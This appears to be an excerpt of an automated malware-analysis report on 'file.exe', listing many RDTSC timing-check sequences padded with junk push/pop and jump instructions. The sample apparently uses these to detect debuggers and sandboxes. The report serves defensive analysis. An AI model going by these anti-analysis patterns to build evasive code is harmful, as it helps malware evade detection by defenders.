                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4C070 second address: E4C076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4C076 second address: E4C07E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51F34 second address: E51F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50EA9 second address: E50EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50EAD second address: E50ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC558h 0x00000007 jne 00007FE478BEC546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE478BEC546h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50ED9 second address: E50EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E513FB second address: E51401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51597 second address: E515B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBCh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FE478F58EB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5183F second address: E51857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FE478BEC54Eh 0x0000000b popad 0x0000000c push esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5576A second address: E55776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jo 00007FE478F58EB6h 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55776 second address: E55796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Bh 0x00000007 jo 00007FE478BEC557h 0x0000000d jmp 00007FE478BEC54Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E57C83 second address: E57C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E57C98 second address: E57CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE478BEC546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FE478BEC54Bh 0x00000012 pushad 0x00000013 jc 00007FE478BEC546h 0x00000019 js 00007FE478BEC546h 0x0000001f jmp 00007FE478BEC54Fh 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E57CD3 second address: E57CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E597B7 second address: E597BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E2E3 second address: E5E2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE478F58EBCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E2F3 second address: E5E318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE478BEC54Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E318 second address: E5E331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE478F58EBEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E331 second address: E5E337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E4A7 second address: E5E4AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E844 second address: E5E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E848 second address: E5E87A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE478F58EBEh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E87A second address: E5E881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63B9A second address: E63B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63E8D second address: E63EBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478BEC553h 0x0000000d jmp 00007FE478BEC556h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64034 second address: E64053 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE478F58EC5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64053 second address: E6406C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Ch 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a js 00007FE478BEC546h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6846B second address: E68487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E68913 second address: E68950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC557h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FE478BEC548h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FE478BEC54Bh 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E68C52 second address: E68C5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FE478F58EB6h 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD24A4 second address: DD24A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD24A9 second address: DD24C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FE478F58EBFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E70D81 second address: E70D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FE478BEC546h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E71018 second address: E71029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE478F58EB6h 0x0000000a jc 00007FE478F58EB6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E71029 second address: E71033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE478BEC546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E715AA second address: E715BA instructions: 0x00000000 rdtsc 0x00000002 js 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E715BA second address: E715BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E718DF second address: E71914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478F58EC5h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FE478F58EC4h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E71914 second address: E7193A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FE478BEC54Eh 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 jmp 00007FE478BEC54Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E71BC2 second address: E71BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FE478F58EC7h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FE478F58EBCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E71BED second address: E71BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E71BF1 second address: E71BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E72465 second address: E7248A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FE478BEC559h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7248A second address: E7248E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E76923 second address: E76935 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478BEC54Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E76935 second address: E76941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FE478F58EB6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75B45 second address: E75B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FE478BEC546h 0x0000000d popad 0x0000000e push edi 0x0000000f jmp 00007FE478BEC54Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75B65 second address: E75BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FE478F58EC1h 0x0000000d jmp 00007FE478F58EC2h 0x00000012 jmp 00007FE478F58EBBh 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FE478F58EB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BA5 second address: E75BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75BA9 second address: E75BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75E4E second address: E75E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007FE478BEC548h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FE478BEC546h 0x00000013 jl 00007FE478BEC546h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75E69 second address: E75E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FE478F58EC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75E89 second address: E75EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE478BEC557h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75EA9 second address: E75EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E76092 second address: E760A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E76214 second address: E76261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnp 00007FE478F58EB6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007FE478F58EBDh 0x0000001b jmp 00007FE478F58EBEh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 ja 00007FE478F58EB6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E76261 second address: E7626D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE478BEC546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7B2F9 second address: E7B344 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478F58EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jc 00007FE478F58EB6h 0x00000012 jmp 00007FE478F58EBCh 0x00000017 popad 0x00000018 jmp 00007FE478F58EC0h 0x0000001d jmp 00007FE478F58EBEh 0x00000022 jc 00007FE478F58EBCh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E82E11 second address: E82E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E82E16 second address: E82E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E810E0 second address: E810FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478BEC557h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E810FB second address: E81116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81116 second address: E8111B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8128F second address: E812A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EBFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81519 second address: E8151D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E818E0 second address: E818FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE478F58EB6h 0x00000008 jmp 00007FE478F58EBEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E818FC second address: E8190B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8190B second address: E81941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FE478F58EC1h 0x0000000f jmp 00007FE478F58EC7h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81CF2 second address: E81CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81CF8 second address: E81CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81CFC second address: E81D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478BEC54Fh 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81E45 second address: E81E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81E54 second address: E81E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE478BEC54Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81E68 second address: E81E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FE478F58EBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8256A second address: E8256E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8256E second address: E82574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E82574 second address: E825A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE478BEC556h 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnl 00007FE478BEC546h 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jng 00007FE478BEC548h 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E825A8 second address: E825AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A000 second address: E8A00A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478BEC552h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8E1F5 second address: E8E201 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCB873 second address: DCB88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE478BEC555h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCB88F second address: DCB8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCB8A7 second address: DCB8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC8278 second address: DC8281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACDC0 second address: EACDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACDC4 second address: EACDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACDC8 second address: EACDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE478BEC54Fh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACDE5 second address: EACDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAF128 second address: EAF12D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAF12D second address: EAF145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE478F58EBDh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAF145 second address: EAF153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2079 second address: EB2089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FE478F58EB6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2089 second address: EB2090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2090 second address: EB209C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE478F58EB6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
